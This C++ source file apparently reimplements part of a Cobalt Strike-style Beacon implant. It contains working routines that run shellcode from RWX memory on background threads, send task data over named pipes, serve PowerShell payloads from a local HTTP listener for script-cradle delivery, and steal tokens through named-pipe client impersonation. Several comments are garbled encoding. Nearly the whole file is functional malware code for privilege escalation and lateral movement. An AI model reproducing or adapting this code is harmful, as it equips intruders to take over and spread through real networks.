375 lines
9.4 KiB
C++
375 lines
9.4 KiB
C++
#include "BeaconLateralMovement.h"
|
||
#include "common.h"
|
||
|
||
HANDLE g_hToken;
|
||
HANDLE g_hObject;
|
||
HANDLE g_hHandle;
|
||
|
||
int __stdcall sub_1000A6D3(BeaconBackgroundThreads* pBeaconBackgroundThreads)
|
||
{
|
||
((void(__stdcall*)(void*))pBeaconBackgroundThreads->StartAddress)(pBeaconBackgroundThreads);
|
||
pBeaconBackgroundThreads->pVirtualFree(pBeaconBackgroundThreads, 0, MEM_RELEASE);
|
||
return 0;
|
||
}
|
||
|
||
void BeaconNULL1()
|
||
{
|
||
return;
|
||
}
|
||
|
||
|
||
|
||
void* sub_1000520B(size_t shellcodesize, void* shellcode)
|
||
{
|
||
|
||
int min_alloc = get_dword(45);
|
||
if (shellcodesize > min_alloc)
|
||
{
|
||
min_alloc = shellcodesize + 1024;
|
||
}
|
||
int rxw = get_short(43);
|
||
PVOID pshellcode = VirtualAlloc(0, min_alloc, 0x3000u, rxw);
|
||
if (pshellcode)
|
||
{
|
||
memcpy(pshellcode, shellcode, shellcodesize);
|
||
return CheckMemoryRWX(pshellcode, min_alloc) != 0 ? pshellcode : 0;
|
||
}
|
||
else
|
||
{
|
||
BeaconErrorDD(0x1Fu, min_alloc, GetLastError());
|
||
return 0;
|
||
}
|
||
}
|
||
|
||
void sub_1000A6F9()
|
||
{
|
||
if (!lpStartAddress)
|
||
{
|
||
lpStartAddress = sub_1000520B((char*)BeaconNULL1 - (char*)sub_1000A6D3, sub_1000A6D3);
|
||
}
|
||
}
|
||
|
||
HANDLE sub_1000A71D(void* plpStartAddress, void* lpParameter)
|
||
{
|
||
|
||
BeaconBackgroundThreads* pBeaconBackgroundThreads;
|
||
|
||
pBeaconBackgroundThreads = (BeaconBackgroundThreads*)VirtualAlloc(0, sizeof(BeaconBackgroundThreads), 0x3000u, 4u);
|
||
pBeaconBackgroundThreads->StartAddress = plpStartAddress;
|
||
pBeaconBackgroundThreads->lpParameter = lpParameter;
|
||
pBeaconBackgroundThreads->pVirtualFree = VirtualFree;
|
||
sub_1000A6F9();
|
||
if (lpStartAddress)
|
||
{
|
||
return CreateThread(0, 0, (LPTHREAD_START_ROUTINE)lpStartAddress, pBeaconBackgroundThreads, 0, 0);
|
||
}
|
||
return (HANDLE)-1;
|
||
}
|
||
|
||
HANDLE BeaconCreateBackgroundThreads(void* lpStartAddress, void* lpParameter)
|
||
{
|
||
++BackgroundThreadsNumber;
|
||
if (get_short(39) == 1)
|
||
{
|
||
return sub_1000A71D(lpStartAddress, lpParameter);
|
||
}
|
||
else
|
||
{
|
||
return CreateThread(0, 0, (LPTHREAD_START_ROUTINE)lpStartAddress, lpParameter, 0, 0);
|
||
}
|
||
}
|
||
|
||
int sub_10005983(char* pipename, HANDLE* hFile)
|
||
{
|
||
return ConnectJobPipe(hFile, 0, pipename);
|
||
}
|
||
|
||
void NamedPipesSendData(char* Taskdata, int Task_size)
|
||
{
|
||
|
||
int timeout = GetTickCount() + 60000;
|
||
datap pdatap;
|
||
BeaconDataParse(&pdatap, Taskdata, Task_size);
|
||
char pipename[132];
|
||
BeaconDataCopyToBuffer(&pdatap, pipename, 128);
|
||
char* databuffer = BeaconDataBuffer(&pdatap);
|
||
int length = BeaconDataLength(&pdatap);
|
||
HANDLE hFile;
|
||
int number=0;
|
||
while (!sub_10005983(pipename, &hFile))
|
||
{
|
||
if (GetLastError() != 53 && GetTickCount() < timeout)
|
||
{
|
||
Sleep(0x3E8u);
|
||
if (++number < 10)
|
||
{
|
||
continue;
|
||
}
|
||
}
|
||
BeaconTaskError1Output(0x32u, GetLastError(), pipename);
|
||
return;
|
||
}
|
||
DWORD NumberOfBytesWritten;
|
||
WriteFile(hFile, &length, 4, &NumberOfBytesWritten, 0);
|
||
int writesize = 0;
|
||
if (length)
|
||
{
|
||
do
|
||
{
|
||
int nNumberOfBytesToWrite = length - writesize;
|
||
if (nNumberOfBytesToWrite > 0x2000)
|
||
{
|
||
nNumberOfBytesToWrite = 0x2000;
|
||
}
|
||
if (!WriteFile(hFile, &databuffer[writesize], nNumberOfBytesToWrite, &NumberOfBytesWritten, 0))
|
||
{
|
||
break;
|
||
}
|
||
writesize = NumberOfBytesWritten + writesize;
|
||
} while (writesize < length);
|
||
}
|
||
FlushFileBuffers(hFile);
|
||
DisconnectNamedPipe(hFile);
|
||
CloseHandle(hFile);
|
||
Sleep(0x3E8u);
|
||
}
|
||
|
||
|
||
BeaconMiniHttp* InitMiniHttp(size_t size, SOCKET socket, void* data)
|
||
{
|
||
|
||
BeaconMiniHttp* pBeaconMiniHttp = (BeaconMiniHttp*)malloc(sizeof(BeaconMiniHttp));
|
||
pBeaconMiniHttp->socket = socket;
|
||
char* payload = (char*)malloc(size);
|
||
memcpy(payload, data,size);
|
||
pBeaconMiniHttp->payload = payload;
|
||
pBeaconMiniHttp->payloadsize = size;
|
||
|
||
char* httpheader = (char*)malloc(0x100u);
|
||
pBeaconMiniHttp->httpheader = httpheader;
|
||
_snprintf(
|
||
httpheader,
|
||
0x100,
|
||
"HTTP/1.1 200 OK\r\nContent-Type: application/octet-stream\r\nContent-Length: %d\r\n\r\n",
|
||
size);
|
||
|
||
pBeaconMiniHttp->httpheadersize = strlen(httpheader);
|
||
pBeaconMiniHttp->rvcedata = (char*)malloc(0x800u);
|
||
return pBeaconMiniHttp;
|
||
}
|
||
|
||
void BeaconMiniHttpFree(BeaconMiniHttp* pBeaconMiniHttp)
|
||
{
|
||
closesocket(pBeaconMiniHttp->socket);
|
||
free(pBeaconMiniHttp->payload);
|
||
free(pBeaconMiniHttp->rvcedata);
|
||
free(pBeaconMiniHttp->httpheader);
|
||
free(pBeaconMiniHttp);
|
||
}
|
||
|
||
unsigned int sub_1000AE98(char* buffer, SOCKET s)
|
||
{
|
||
int size = 0;
|
||
while (1)
|
||
{
|
||
int recvsize = recv(s, &buffer[size], 1, 0);
|
||
if (recvsize <= 0)
|
||
{
|
||
return -1;
|
||
}
|
||
size += recvsize;
|
||
if (size >= 2 && buffer[size - 1] == 10 && buffer[size - 2] == 13)
|
||
{
|
||
break;
|
||
}
|
||
if (size >= 0x800)
|
||
{
|
||
return -1;
|
||
}
|
||
}
|
||
buffer[size - 2] = 0;
|
||
return size;
|
||
}
|
||
|
||
void __stdcall StartMiniHttpThread(BeaconMiniHttp* pBeaconMiniHttp)
|
||
{
|
||
|
||
SOCKET S = accept(pBeaconMiniHttp->socket, 0, 0);
|
||
if (S == -1)
|
||
{
|
||
BeaconMiniHttpFree(pBeaconMiniHttp);
|
||
}
|
||
else
|
||
{
|
||
while (sub_1000AE98(pBeaconMiniHttp->rvcedata, S) > 2)
|
||
{
|
||
;
|
||
}
|
||
send(S, pBeaconMiniHttp->httpheader, pBeaconMiniHttp->httpheadersize, 0);
|
||
send(S, pBeaconMiniHttp->payload, pBeaconMiniHttp->payloadsize, 0);
|
||
BeaconMiniHttpFree(pBeaconMiniHttp);
|
||
closesocket(S);
|
||
}
|
||
--BackgroundThreadsNumber;
|
||
}
|
||
|
||
void StartHttpWebDelivery(size_t len, u_short port, char* data)
|
||
{
|
||
|
||
sockaddr_in name;
|
||
|
||
init_socket_options();
|
||
SOCKET s = socket(2, 1, 0);
|
||
if (s == -1)
|
||
{
|
||
closesocket(0xFFFFFFFF);
|
||
}
|
||
else
|
||
{
|
||
name.sin_family = AF_INET;
|
||
name.sin_addr.s_addr = inet_addr("127.0.0.1");
|
||
name.sin_port = htons(port);
|
||
|
||
if (bind(s, (SOCKADDR *)&name, sizeof(sockaddr_in)) == -1 || listen(s, 120) == -1)
|
||
{
|
||
closesocket(s);
|
||
}
|
||
else
|
||
{
|
||
//<2F><><EFBFBD><EFBFBD>һ<EFBFBD><D2BB>http
|
||
BeaconMiniHttp* pBeaconMiniHttp = InitMiniHttp(len, s, data);
|
||
BeaconCreateBackgroundThreads(StartMiniHttpThread, pBeaconMiniHttp);
|
||
}
|
||
}
|
||
}
|
||
|
||
void ScriptCradle(char* Taskdata, int Task_size)
|
||
{
|
||
datap pdatap;
|
||
BeaconDataParse(&pdatap, Taskdata, Task_size);
|
||
short randomPort =BeaconDataShort(&pdatap);
|
||
int szie = BeaconDataLength(&pdatap);
|
||
char* powershellscript = (char*)BeaconDataBuffer(&pdatap);
|
||
return StartHttpWebDelivery(szie, randomPort, powershellscript);
|
||
}
|
||
|
||
|
||
DWORD __stdcall StartNamedPipeThread()
|
||
{
|
||
|
||
char Buffer[128] = {0};
|
||
DWORD NumberOfBytesRead = 0;
|
||
while (!ConnectNamedPipe(g_hObject, 0) && GetLastError() != 535)
|
||
{
|
||
;
|
||
}
|
||
if (ReadFile(g_hObject, Buffer, 1u, &NumberOfBytesRead, 0))
|
||
{
|
||
if (ImpersonateNamedPipeClient(g_hObject))
|
||
{
|
||
if (OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, 0, &g_hToken))
|
||
{
|
||
if (g_hObject)
|
||
{
|
||
DisconnectNamedPipe(g_hObject);
|
||
CloseHandle(g_hObject);
|
||
}
|
||
}
|
||
}
|
||
}
|
||
--BackgroundThreadsNumber;
|
||
return 0;
|
||
}
|
||
|
||
//************************************
|
||
// Method: StartNamedPipeReceiveData
|
||
// FullName: StartNamedPipeReceiveData
|
||
// Access: public
|
||
// Returns: void
|
||
// Qualifier:<3A><><EFBFBD><EFBFBD>һ<EFBFBD><D2BB><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ܵ<EFBFBD><EFBFBD><D7BC><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
// Parameter: char * Taskdata
|
||
// Parameter: int Task_size
|
||
//************************************
|
||
void StartNamedPipeReceiveData(char* Taskdata, int Task_size)
|
||
{
|
||
CHAR Name[260];
|
||
|
||
if (Task_size < 256)
|
||
{
|
||
memcpy(Name, Taskdata, Task_size);
|
||
g_hToken = (HANDLE)-1;
|
||
g_hObject = (HANDLE)-1;
|
||
g_hHandle = (HANDLE)-1;
|
||
Name[Task_size] = 0;
|
||
g_hObject = CreateNamedPipeA(Name, 3, 4, 2, 0, 0, 0, 0);
|
||
if (g_hObject)
|
||
{
|
||
g_hHandle = BeaconCreateBackgroundThreads((LPTHREAD_START_ROUTINE)StartNamedPipeThread, 0);
|
||
}
|
||
}
|
||
}
|
||
|
||
void ImpersonationToken()
|
||
{
|
||
char usersid[0x200] = { 0 };
|
||
|
||
if (g_hHandle != (HANDLE)-1)
|
||
{
|
||
WaitForSingleObject(g_hHandle, 0x3A98u);
|
||
}
|
||
if (g_hToken == (HANDLE)-1)
|
||
{
|
||
BeaconErrorNA(1u);
|
||
}
|
||
else if (ImpersonateLoggedOnUser(g_hToken))
|
||
{
|
||
pTokenHandle = g_hToken;
|
||
if (get_user_sid(0x200u, g_hToken, usersid))
|
||
{
|
||
BeaconTaskOutput(usersid, strlen(usersid), 0xFu);
|
||
}
|
||
}
|
||
else
|
||
{
|
||
BeaconErrorD(0xCu, GetLastError());
|
||
}
|
||
}
|
||
|
||
/// <summary>
|
||
/// powershellpayload<61><64>79<37><39>37<33><37><EFBFBD><EFBFBD>
|
||
/// </summary>
|
||
char* powershellpayload;
|
||
|
||
void BeaconPowerShellImport(char* Taskdata, int Task_size)
|
||
{
|
||
|
||
if (powershellpayload)
|
||
{
|
||
free(powershellpayload);
|
||
}
|
||
powershellpayload = (char*)malloc(Task_size + 1);
|
||
memcpy(powershellpayload, Taskdata, Task_size);
|
||
powershellpayload[Task_size] = 0;
|
||
}
|
||
|
||
|
||
//************************************
|
||
// Method: BeaconWebDelivery
|
||
// FullName: BeaconWebDelivery
|
||
// Access: public
|
||
// Returns: void
|
||
// Qualifier:ͨ<><CDA8><EFBFBD><EFBFBD><EFBFBD><EFBFBD>һ<EFBFBD><D2BB>http<74>й<EFBFBD><D0B9>ļ<EFBFBD>
|
||
// Parameter: char * Taskdata
|
||
// Parameter: int Task_size
|
||
//************************************
|
||
void BeaconWebDelivery(char* Taskdata, int Task_size)
|
||
{
|
||
|
||
if (powershellpayload)
|
||
{
|
||
datap pdatap;
|
||
BeaconDataParse(&pdatap, Taskdata, Task_size);
|
||
short port = BeaconDataShort(&pdatap);
|
||
StartHttpWebDelivery(strlen(powershellpayload), port, powershellpayload);
|
||
}
|
||
} |